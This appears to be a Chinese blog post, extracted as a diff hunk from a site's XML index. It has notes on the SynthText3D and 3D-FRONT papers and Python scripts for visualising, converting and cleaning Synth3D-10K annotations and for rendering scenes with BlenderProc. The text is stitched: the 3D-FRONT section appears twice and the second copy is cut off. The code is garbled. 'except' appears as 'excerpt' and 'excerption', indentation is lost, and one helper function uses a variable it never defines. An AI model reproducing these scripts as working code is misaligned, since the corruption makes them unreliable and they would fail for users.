    • $t$ 被设为 100,表示法向量与其相邻向量之间的 $L_1$ 范数差的阈值。

    • $N_{i,j}$ 是法线边界图 $B$ 中的位置 $(i,j)$ 的值。

    • ${N0_{i,j},…,Nk_{i,j}}$ 是 4 个相邻位置(图像的边界位置除外)的一组法向量。

    • $|.|$ 是 $L_1$ 范数。

    jpg

    文本区域生成说明:
    (a) 原始图像
    (b) 曲面法线贴图
    (c) 法线边界图
    (d) 和 (e) 是生成的文本区域

    随机二进制搜索

    ​ 为了彻底提取所有可用的文本区域,我们在图像上设置了一个初始候选区域网格,灵感来自基于锚的对象检测器。

    ​ 在每个初始位置,我们从一个初始矩形边界框开始,该边界框的最小大小足以放置文本,设置为 32×64 像素。初始矩形框的步幅是从(12;24;36)中随机选择的。为了检索最大面积,我们提出了一种随机二进制搜索方法。

    ​ 在每个搜索步骤中,我们随机展开矩形的一侧。展开遵循二进制搜索的规则:

    • 下限被设置为当前边缘位置,上限被设置为图像的相应边缘。如果展开的矩形没有越过法线边界,则下限更新为中点;
    • 否则,将上限更新到中点。当每条边的上界和下界相等时,该算法收敛。
    • 在所有锚处生成框后,我们以随机顺序逐一检查每个框,如果任何框与任何其他框重叠,则将其丢弃。

    3.4. Text Generation

    ​ 生成文本区域后,我们随机抽取几个可用的文本区域进行文本渲染。给定一个文本区域及其 RBG 图像,文本生成模块旨在对具有特定外观的文本内容进行采样,包括字体和文本颜色。为了公平地与 SynthText 进行比较,我们使用了与相关论文相同的文本源,后者来自 Newsgroup 20 数据集。

    ​ 文本内容是从具有三种结构的文本源中随机抽取的,包括单词、行(最多 3 行)和段落。

    ​ 我们从 Google Fonts3 中随机抽取字体样本,用于生成文本的纹理。文本颜色由文本区域的背景决定,使用 SynthText 中相同的调色板模型。每个区域的纹理和颜色将被输入到 3D 渲染模块中,以执行 3D 渲染。

    3.5 3D Rendering

    ​ 三维渲染三维渲染包括两个子模块。

    • 第一个是 Text Placing Module,旨在将文本放置到三维虚拟世界中。
    • 第二个是 Rendering module,其中可以执行照明和可见性调整、视点变换、遮挡。

    3.5.1 Text Placing

    ​ 看样子它是根据 2D 的法线图,用 3D 的方式把文字打在图上的。

    2D-to-3D Region Projection

    ​ 使用从粗到细的策略将 2D 文本区域投影到 3D 虚拟世界中。

    ​ 假设 $p_j=(x_i,y_j)$ 是 2D 地图的坐标点,$d_j$ 是 $p_j$ 的深度值,则粗粒度 3D 坐标 $P=(X_j,Y_j,Z_j)$ 可以如下计算:

    $$\begin{bmatrix} X_j \ Y_j \ Z_j \end{bmatrix} = K \times d_j \times \begin{bmatrix} x_j \ y_j \ 1 \end{bmatrix}$$

    ​ 其中 $K$ 是相机的内部参考矩阵,它是相机的属性参数。整数深度的位置和浮点深度的位置之间出现偏差。

    jpg

    由整数深度和浮点深度计算的坐标。
    Pv:视点的坐标点;
    Pi:整数深度的坐标点;
    Pf:浮点深度的坐标点。

    ​ 为了获得细粒度的坐标,我们采用了光线投射,这是一个确定光线是否与物体相交以及在哪里相交的过程。如上图所示,我们初始化光线 $V=(P_i−P_v)$,其中 $P_i$ 是上式中估计的粗略点。然后,可以通过射线投射来获得细粒度点 $P_f$,该射线投射检测到离 $P_v$ 最近的命中点。

    ​ 最后通过迭代 3D 四边形来使得最后的边界框变成 3D 轴对齐的边界框。

    Text Deformation

    ​ 在自然情况下,并不是所有的文本区域都是平面,例如瓶子和衣服的表面,文本需要变形以适应目标表面。

    ​ 变形算法如下所示。我们将文本平面视为三角网格,将文本视为网格的纹理贴图。首先将网格的四个角顶点固定到区域角,然后将中间顶点变换到目标对象表面上最近的位置。最后,根据相对于角顶点的欧几里得距离来估计顶点的纹理坐标。

    jpg

    3.5.2 Rendering

    ​ 我们分别为每个场景建立了几个环境设置。对于每个室内场景,我们构建三种照明:正常照度、亮度和黑暗度。

    ​ 除了照明之外,我们还为室外场景添加了雾环境。

    ​ 渲染过程:Demonstration for Paper – SynthText3D: Synthesizing Scene Text Images from 3D Virtual Worlds - YouTube

    4. Experiments

    ​ 合成图像的硬件要求:

    • i7-8700 CPU
    • Nvidia GeForce GTX 1060 GPU
    • 16G RAM

    ​ 2 秒一张,大小为 720 * 1080

    4.1. Datasets

    ​ 用于评估和对比实验的数据集:

    • SynthText:800K 张,随机抽了 10K,就叫它 SynthText-10k。
    • VISD(10K)
    • ICDAR 2013(229+233)
    • ICDAR 2015(1000+500)
    • MLT(ICDAR2017,7200+1800+9000)

    4.2. Visual Analysis

    ​ 视觉分析两个关键因素影响合成数据的视觉效果。一个是合适的文本区域。另一个是渲染效果。

    4.2.1 Suitable Text Regions

    ​ 搁这吹自己 Text Regions 位置放的好呢。

    4.2.2 Rendering Effect

    ​ 搁这吹自己图像渲染得真实呢。

    4.3. Scene Text Detection

    ​ 使用 EAST,ResNet-50 作为 backbone,4 个 GPU,batch size 为 56。

    4.3.1 Pure Synthetic Data

    jpg

    ​ 比 SynthText 10K 好使!甚至我们 10K 的数据量比 800K 的 SynthText 都牛逼!

    ​ VISD 没有公开源码,只有数据集,我们的效果不如它,但是还是要嘴硬一句我们生成的图像在透视变换、各种照明和遮挡方面具有更逼真的外观。

    ​ 混合数据(我们的 5K+VISD 5K)进行训练来进行实验,效果最棒棒喔!

    4.3.2 Combination of Synthetic Data & Real Data

    jpg

    ​ 将合成数据集和真实数据集放一起 Train,效果还是比 VISD 低,真是气死宝宝了!

    ​ 继续嘴硬。VISD 使用 10K 真实世界背景图像,提供丰富的对象和纹理。然而,我们的合成图像是由基于大约 200 个相机锚点的 3D 虚拟世界投影的。这可能是我们的改进略低于 VISD 的原因。

    4.4. Limitations

    ​ 我们的方法的主要局限性是我们需要手动选择相机锚,尽管这相对容易实现,因为每个虚拟世界只有大约 20-30 个相机锚。然而,考虑到以前的方法也需要手动检查或注释来过滤包含文本的背景图像,我们的手动选择是可以接受的。我们将在未来的工作中尝试通过引入一种自动生成相机锚的算法来改进它。

    ​ 应该就是下一个论文了。

    5. Conclusion

    ​ 总结一下完事。

    代码

    数据集可视化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 27

    image_dir = r'E:\dataset\Synth3D-10K\img\\'
    label_dir = r'E:\dataset\Synth3D-10K\label\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ​ 但是通过人工审查,有些图像的质量实在不敢恭维,这真的好使吗?

    png

    转换成 TotalText 形式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    import numpy as np
    import os
    from tqdm import tqdm

    label_dir = r'E:\dataset\Synth3D-10K\label'
    save_dir = r"E:\dataset\Synth3D-10K\Txts"

    for index in tqdm(range(1, 10000 + 1)):
    label_path = os.path.join(label_dir, str(index) + '.txt')

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    string = ""

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += "#"
    string += "']\n"
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)
    1
    2
    3
    4
    5
    6
    7
    import os
    from tqdm import tqdm

    file_dir = r"E:\dataset\Synth3D-10K\Images\\"

    for file in tqdm(os.listdir(file_dir)):
    os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))

    保存可视化结果(TotalText 形式)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt
    from shapely.geometry import Polygon
    from tqdm import tqdm

    image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
    label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
    save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

    for index in tqdm(range(1, 10001)):
    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    try:
    label_file = open(label_path, 'r')
    excerpt:
    continue
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)


    cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)

    清洗数据

    ​ 果然里面错误的数据太多,放到 mindOCR 里直接跑不动,让我怀疑这篇论文是不是有点问题,还得洗一洗:

    ​ 去除注释中:

    • 过小

    • 相交

    • 越界

    • 非法

    ​ 的数据,勉强能跑。

    ​ 还有些数据错的更复杂,算了能跑就行吧。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt
    from shapely.geometry import Polygon
    from tqdm import tqdm


    def check_intersection(rectangle, rectangle_list):
    for other_rectangle in rectangle_list:
    if rectangle != other_rectangle:
    other_polygon = Polygon(other_rectangle)

    if polygon.intersects(other_polygon):
    return True

    return False


    image_dir = r'F:\dataset\Synth3D-10K\img\\'
    label_dir = r'F:\dataset\Synth3D-10K\label\\'
    save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
    error_list = []

    for index in range(1, 10000 + 1):
    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
    points_list = []
    is_error = False

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points_list.append(Polygon(np.array([x, y], np.int32).T))

    if not is_error:
    string = ""
    for i in range(len(x_list)):
    x = list(map(int, x_list[i]))
    y = list(map(int, y_list[i]))

    polygon = Polygon(np.array([x, y], np.int32).T)

    if polygon.area < 200:
    is_error = True
    error_list.append(index)
    print(index, "四边形太小", polygon.area)
    continue

    if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
    is_error = True
    error_list.append(index)
    print(index, "不构成四边形")
    continue

    if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
    is_error = True
    error_list.append(index)
    print(index, "越界")
    continue

    if check_intersection(polygon, points_list):
    is_error = True
    error_list.append(index)
    print(index, "相交", polygon.area)
    continue

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += "A"
    string += "']\n"
    if len(string) > 0:
    print("写入", index)
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)
    ]]>
    @@ -5098,7 +5098,7 @@ /posts/Paper-3D-FRONT-3D%20Furnished%20Rooms%20with%20layOuts%20and%20semaNTics/ - 资源

    全文

    Abstract

    ​ 3D-FRONT 数据集:

    • 带布局和 semaNTics 的 3D 家具房间

    • 一个新的、大规模的、全面的合成室内场景库

    • 以专业设计的布局为重点

    • 大量房间由具有风格兼容性的高质量纹理 3D 模型填充

    • 从布局语义到单个对象的纹理细节

    ​ 发布了 Trescope,一个轻量级的渲染工具,以支持 3D-FRONT 中 2D 图像和注释的基准渲染。

    1. Introduction

    ​ 计算机视觉界在 3D 室内场景的研究上投入了大量精力,从 3D 重建、视觉 SLAM 和导航,到场景理解、可供性分析和生成建模。

    ​ 现有的 3D 场景数据集分为两大类:acquired(通过扫描和重建)和 designed。acquired 的网格在几何保真度和纹理质量方面往往质量较低。

    ​ 在本文中,我们介绍了 3D-FRONT(带布局和 semaNTics 的 3D 家具室),这是一个新的、大规模的、综合的合成 3D 室内场景库。它:

    • 包含专业且独特设计的布局,涵盖 31 个场景类别、对象语义(例如,类别、样式和材质标签),
    • 大量(18968)填充有 3D 家具对象的房间。
    • 这些 3D 家具对象都具有高质量的纹理,这要归功 3DFUTURE,这是一个最近发布的工业生产中使用的高质量 3D 家具数据集。

    ​ 介绍了 3D 数据集中两大类别:

    • Acquired Scenes

    • Designed Scenes

    ​ 然后说了这些数据集目前的不足,3D-FROUNT 分享了用于建造房屋的一切,目前功能最齐全。

    3. Building 3D-FRONT

    ​ 从一些房屋集合开始,创建房间套房,优化布局,验证创建的室内设计,并最终指定合格的相机视点。

    jpg

    3D-FRONT 的管道。我们从一个有专业设计思想的空房子开始,创建房间套房,优化布局(例如,解决红框中突出的工件),并最终验证带家具的房间。

    jpg

    视点生成。每个场景都与几个自然摄影机视图相关联,以便于渲染。

    3.1. Room Suite Creation

    ​ 房间的设计思想包括对象的类别标签及其位置、方向、大小和样式。以卧室为例,我们首先根据所需的尺寸和风格,从 3D 模型池中随机选择一个种子对象,例如床。然后,我们根据迄今为止的房间套房反复识别视觉匹配的家具,直到房间被填满。

    ​ 主要依靠 3D-FUTURE 中的家具套房组合(FSC)方法来创建视觉兼容的套房。具体来说,利用大规模的专家场景设计,我们执行了两项任务,即掩码预测和套件兼容性评分,以对视觉兼容性进行建模。

    • 第一个任务预测套房中给定其他对象的遮罩(移除)家具。
    • 第二个任务评估输入套件的兼容性得分。我们使用纹理图像来表示每个对象(家具)。

    ​ 3D-FUTURE 首先采用从 VEN 中提取的视觉嵌入来执行初步排名,然后采用经过训练的 GBDT-LR 模型来对所选候选进行重新排名,以进行在线推荐。我们通过考虑图自动编码器技术来改进初级排序阶段。

    3.2. Layout Optimization and Verification

    布局优化从最初创建的设计开始,稍微修改房间套房中的对象位置,以满足几个布局约束,包括成对距离、焦点距离、到墙的距离、可达性和碰撞。

    ​ 我们进一步验证了创建的设计,并删除了不满意的设计,以确保数据集的质量。

    3.3. Viewpoint Generation

    视点生成旨在为每个场景分配多个摄影机,并确保大多数摄影机都具有实用的视点。

    4. Validation and Assessment

    ​ 在本节中,我们提供了几种方法来验证和评估数据集的构建方式以及数据的质量和效用。

    • 推荐人系统评估
    • 用户研究
    • 3D-FRONT 的性质
      • 公开共享所有基本数据,这些数据可以实现高质量室内场景的建模,从布局语义到单个对象的风格和纹理细节。
      • 3D-FRONT 能够实现与 3D 场景相关的各种人工智能任务,包括数据驱动的设计研究,如平面图合成、室内场景合成和场景套件兼容性预测,而其他场景数据集则无法充分支持这些任务。它也有利于研究 3D 场景理解主题,如 SLAM、3D 场景重建和 3D 场景分割。

    5. Applications

    5.1. Interior Scene Synthesis

    室内场景合成

    5.2. Texturing 3D Models in Indoor Scenes

    ​ 在室内场景中对 3D 模型进行纹理处理。

    ​ 将最近的纹理网格生成模型 TM-Net 扩展到 3D 场景纹理任务。

    ​ 在训练生成模型后,我们合成随机形状的纹理,并将其用作其他对象的条件。

    6. Conclusion and future work

    ​ 这个数据集的具体合成细节大概就是这样了。

    BlenderProc

    把数据集下好,用这个代码开跑:


    1. 导入相关的库:
      • blenderproc:一个用于处理和渲染三维模型的库。
      • argparse:用于解析命令行参数。
      • os:用于文件和目录操作。
      • numpy:用于数值计算。
    import blenderproc as bproc
    import argparse
    import os
    import numpy as np
    1. 解析命令行参数:

      • 使用 argparse 库创建一个参数解析器。

      • 添加四个必需的参数:frontfuture_folderfront_3D_texture_pathoutput_dir

      • 解析命令行参数并存储在 args 变量中。

    parser = argparse.ArgumentParser()
    parser.add_argument("front", help="Path to the 3D front file")
    parser.add_argument("future_folder", help="Path to the 3D Future Model folder.")
    parser.add_argument("front_3D_texture_path", help="Path to the 3D FRONT texture folder.")
    parser.add_argument("output_dir", help="Path to where the data should be saved")
    args = parser.parse_args()
    1. 检查文件夹是否存在:

      • 使用 os.path.exists() 函数检查两个文件夹是否存在。

      • 如果其中一个文件夹不存在,则抛出异常。

    if not os.path.exists(args.front) or not os.path.exists(args.future_folder):
    raise excerption("One of the two folders does not exist!")
    1. 初始化:
      • 使用 bproc.init() 进行初始化。
    bproc.init()
    1. 加载前景 3D 对象:

      • 使用 bproc.loader.load_front3d() 函数加载 FRONT-3D 对象。

      • 传入前景文件路径(json_path),未来模型文件夹路径(future_model_path),前景纹理文件夹路径(front_3D_texture_path)和标签映射(label_mapping)。

      • 将加载的对象存储在 loaded_objects 变量中。

    mapping_file = bproc.utility.resolve_resource(os.path.join("front_3D", "3D_front_mapping.csv"))
    mapping = bproc.utility.LabelIdMapping.from_csv(mapping_file)

    # set the light bounces 设置光线反射
    bproc.renderer.set_light_bounces(diffuse_bounces=200, glossy_bounces=200, max_bounces=200,
    transmission_bounces=200, transparent_max_bounces=200)

    # load the front 3D objects 加载 FRONT-3D 对象
    loaded_objects = bproc.loader.load_front3d(
    json_path=args.front,
    future_model_path=args.future_folder,
    front_3D_texture_path=args.front_3D_texture_path,
    label_mapping=mapping
    )

    # Init sampler for sampling locations inside the loaded front3D house
    # 初始化采样器,用于加载的 FRONT-3D 房屋内的采样位置
    point_sampler = bproc.sampler.Front3DPointInRoomSampler(loaded_objects)
    1. 初始化采样器和BVH树:

      • 使用 bproc.sampler.Front3DPointInRoomSampler() 初始化采样器,用于在加载的房间内采样点。

      • 使用 bproc.object.create_bvh_tree_multi_objects() 函数创建包含所有网格对象的 BVH 树。

    # Init bvh tree containing all mesh objects 包含所有网格对象的初始化 bvh 树
    bvh_tree = bproc.object.create_bvh_tree_multi_objects([o for o in loaded_objects if isinstance(o, bproc.types.MeshObject)])
    1. 循环生成场景:

      • 设置最大尝试次数(tries)和生成的姿势数量(poses)的初始值。

      • 通过循环生成不同的摄像机姿势。

      • 随机采样摄像机高度和旋转角度,并使用这些参数构建世界坐标系到相机坐标系的变换矩阵(cam2world_matrix)。

      • 检查生成的视图是否满足条件:场景覆盖分数高于 0.8,障碍物与相机至少 1 米远,障碍物的平均距离在 2.5 到 3.5 米之间,没有背景可见,并且视图足够有趣。

      • 如果满足条件,则将该摄像机姿势添加到渲染管道中,并增加生成的姿势数量(poses)。

      • 更新尝试次数(tries

    poses = 0
    tries = 0


    def check_name(name):
    for category_name in ["chair", "sofa", "table", "bed"]:
    if category_name in name.lower():
    return True
    return False


    # filter some objects from the loaded objects, which are later used in calculating an interesting score
    # 从加载的对象中过滤一些对象,这些对象稍后用于计算有趣的分数
    special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

    proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
    while tries < 10000 and poses < 10:
    # Sample point inside house 房屋内的采样点
    height = np.random.uniform(1.4, 1.8)
    location = point_sampler.sample(height)
    # Sample rotation (fix around X and Y axis) 样品旋转(围绕 X 轴和 Y 轴固定)
    rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

    # Check that obstacles are at least 1 meter away from the camera and have an average distance between 2.5 and 3.5 meters and make sure that no background is visible, finally make sure the view is interesting enough
    # 检查障碍物是否距离相机至少 1 米,平均距离在 2.5 到 3.5 米之间,并确保没有可见的背景,最后确保视图足够有趣
    if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
    and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
    bproc.camera.add_camera_pose(cam2world_matrix)
    poses += 1
    tries += 1
    1. 配置渲染器:

      • 使用 bproc.renderer.enable_normals_output() 启用法线渲染输出。

      • 使用 bproc.renderer.enable_segmentation_output() 启用分割图像输出,并根据类别 ID 进行映射。

    # Also render normals
    bproc.renderer.enable_normals_output()
    bproc.renderer.enable_segmentation_output(map_by=["category_id"])
    1. 渲染整个流程:

      • 使用 bproc.renderer.render() 函数渲染整个管道,包括场景和各种输出。

      • 将渲染结果存储在 data 变量中

    # render the whole pipeline
    data = bproc.renderer.render()
    1. 将数据写入.hdf5文件:
      • 使用 bproc.writer.write_hdf5() 函数将渲染的数据写入一个.hdf5文件。
      • 指定输出路径为 args.output_dir
    # write the data to a .hdf5 container
    bproc.writer.write_hdf5(args.output_dir, data)

    jpg

    好像没什么卵用……

    ]]>
    + 资源

    全文

    Abstract

    ​ 3D-FRONT 数据集:

    • 带布局和 semaNTics 的 3D 家具房间

    • 一个新的、大规模的、全面的合成室内场景库

    • 以专业设计的布局为重点

    • 大量房间由具有风格兼容性的高质量纹理 3D 模型填充

    • 从布局语义到单个对象的纹理细节

    ​ 发布了 Trescope,一个轻量级的渲染工具,以支持 3D-FRONT 中 2D 图像和注释的基准渲染。

    1. Introduction

    ​ 计算机视觉界在 3D 室内场景的研究上投入了大量精力,从 3D 重建、视觉 SLAM 和导航,到场景理解、可供性分析和生成建模。

    ​ 现有的 3D 场景数据集分为两大类:acquired(通过扫描和重建)和 designed。acquired 的网格在几何保真度和纹理质量方面往往质量较低。

    ​ 在本文中,我们介绍了 3D-FRONT(带布局和 semaNTics 的 3D 家具室),这是一个新的、大规模的、综合的合成 3D 室内场景库。它:

    • 包含专业且独特设计的布局,涵盖 31 个场景类别、对象语义(例如,类别、样式和材质标签),
    • 大量(18968)填充有 3D 家具对象的房间。
    • 这些 3D 家具对象都具有高质量的纹理,这要归功 3DFUTURE,这是一个最近发布的工业生产中使用的高质量 3D 家具数据集。

    ​ 介绍了 3D 数据集中两大类别:

    • Acquired Scenes

    • Designed Scenes

    ​ 然后说了这些数据集目前的不足,3D-FROUNT 分享了用于建造房屋的一切,目前功能最齐全。

    3. Building 3D-FRONT

    ​ 从一些房屋集合开始,创建房间套房,优化布局,验证创建的室内设计,并最终指定合格的相机视点。

    jpg

    3D-FRONT 的管道。我们从一个有专业设计思想的空房子开始,创建房间套房,优化布局(例如,解决红框中突出的工件),并最终验证带家具的房间。

    jpg

    视点生成。每个场景都与几个自然摄影机视图相关联,以便于渲染。

    3.1. Room Suite Creation

    ​ 房间的设计思想包括对象的类别标签及其位置、方向、大小和样式。以卧室为例,我们首先根据所需的尺寸和风格,从 3D 模型池中随机选择一个种子对象,例如床。然后,我们根据迄今为止的房间套房反复识别视觉匹配的家具,直到房间被填满。

    ​ 主要依靠 3D-FUTURE 中的家具套房组合(FSC)方法来创建视觉兼容的套房。具体来说,利用大规模的专家场景设计,我们执行了两项任务,即掩码预测和套件兼容性评分,以对视觉兼容性进行建模。

    • 第一个任务预测套房中给定其他对象的遮罩(移除)家具。
    • 第二个任务评估输入套件的兼容性得分。我们使用纹理图像来表示每个对象(家具)。

    ​ 3D-FUTURE 首先采用从 VEN 中提取的视觉嵌入来执行初步排名,然后采用经过训练的 GBDT-LR 模型来对所选候选进行重新排名,以进行在线推荐。我们通过考虑图自动编码器技术来改进初级排序阶段。

    3.2. Layout Optimization and Verification

    布局优化从最初创建的设计开始,稍微修改房间套房中的对象位置,以满足几个布局约束,包括成对距离、焦点距离、到墙的距离、可达性和碰撞。

    ​ 我们进一步验证了创建的设计,并删除了不满意的设计,以确保数据集的质量。

    3.3. Viewpoint Generation

    视点生成旨在为每个场景分配多个摄影机,并确保大多数摄影机都具有实用的视点。

    4. Validation and Assessment

    ​ 在本节中,我们提供了几种方法来验证和评估数据集的构建方式以及数据的质量和效用。

    • 推荐人系统评估
    • 用户研究
    • 3D-FRONT 的性质
      • 公开共享所有基本数据,这些数据可以实现高质量室内场景的建模,从布局语义到单个对象的风格和纹理细节。
      • 3D-FRONT 能够实现与 3D 场景相关的各种人工智能任务,包括数据驱动的设计研究,如平面图合成、室内场景合成和场景套件兼容性预测,而其他场景数据集则无法充分支持这些任务。它也有利于研究 3D 场景理解主题,如 SLAM、3D 场景重建和 3D 场景分割。

    5. Applications

    5.1. Interior Scene Synthesis

    室内场景合成

    5.2. Texturing 3D Models in Indoor Scenes

    ​ 在室内场景中对 3D 模型进行纹理处理。

    ​ 将最近的纹理网格生成模型 TM-Net 扩展到 3D 场景纹理任务。

    ​ 在训练生成模型后,我们合成随机形状的纹理,并将其用作其他对象的条件。

    6. Conclusion and future work

    ​ 这个数据集的具体合成细节大概就是这样了。

    BlenderProc

    把数据集下好,用这个代码开跑:


    1. 导入相关的库:
      • blenderproc:一个用于处理和渲染三维模型的库。
      • argparse:用于解析命令行参数。
      • os:用于文件和目录操作。
      • numpy:用于数值计算。
    1
    2
    3
    4
    import blenderproc as bproc
    import argparse
    import os
    import numpy as np
    1. 解析命令行参数:

      • 使用 argparse 库创建一个参数解析器。

      • 添加四个必需的参数:frontfuture_folderfront_3D_texture_pathoutput_dir

      • 解析命令行参数并存储在 args 变量中。

    1
    2
    3
    4
    5
    6
    parser = argparse.ArgumentParser()
    parser.add_argument("front", help="Path to the 3D front file")
    parser.add_argument("future_folder", help="Path to the 3D Future Model folder.")
    parser.add_argument("front_3D_texture_path", help="Path to the 3D FRONT texture folder.")
    parser.add_argument("output_dir", help="Path to where the data should be saved")
    args = parser.parse_args()
    1. 检查文件夹是否存在:

      • 使用 os.path.exists() 函数检查两个文件夹是否存在。

      • 如果其中一个文件夹不存在,则抛出异常。

    1
    2
    if not os.path.exists(args.front) or not os.path.exists(args.future_folder):
    raise excerption("One of the two folders does not exist!")
    1. 初始化:
      • 使用 bproc.init() 进行初始化。
    1
    bproc.init()
    1. 加载前景 3D 对象:

      • 使用 bproc.loader.load_front3d() 函数加载 FRONT-3D 对象。

      • 传入前景文件路径(json_path),未来模型文件夹路径(future_model_path),前景纹理文件夹路径(front_3D_texture_path)和标签映射(label_mapping)。

      • 将加载的对象存储在 loaded_objects 变量中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    mapping_file = bproc.utility.resolve_resource(os.path.join("front_3D", "3D_front_mapping.csv"))
    mapping = bproc.utility.LabelIdMapping.from_csv(mapping_file)

    # set the light bounces 设置光线反射
    bproc.renderer.set_light_bounces(diffuse_bounces=200, glossy_bounces=200, max_bounces=200,
    transmission_bounces=200, transparent_max_bounces=200)

    # load the front 3D objects 加载 FRONT-3D 对象
    loaded_objects = bproc.loader.load_front3d(
    json_path=args.front,
    future_model_path=args.future_folder,
    front_3D_texture_path=args.front_3D_texture_path,
    label_mapping=mapping
    )

    # Init sampler for sampling locations inside the loaded front3D house
    # 初始化采样器,用于加载的 FRONT-3D 房屋内的采样位置
    point_sampler = bproc.sampler.Front3DPointInRoomSampler(loaded_objects)
    1. 初始化采样器和BVH树:

      • 使用 bproc.sampler.Front3DPointInRoomSampler() 初始化采样器,用于在加载的房间内采样点。

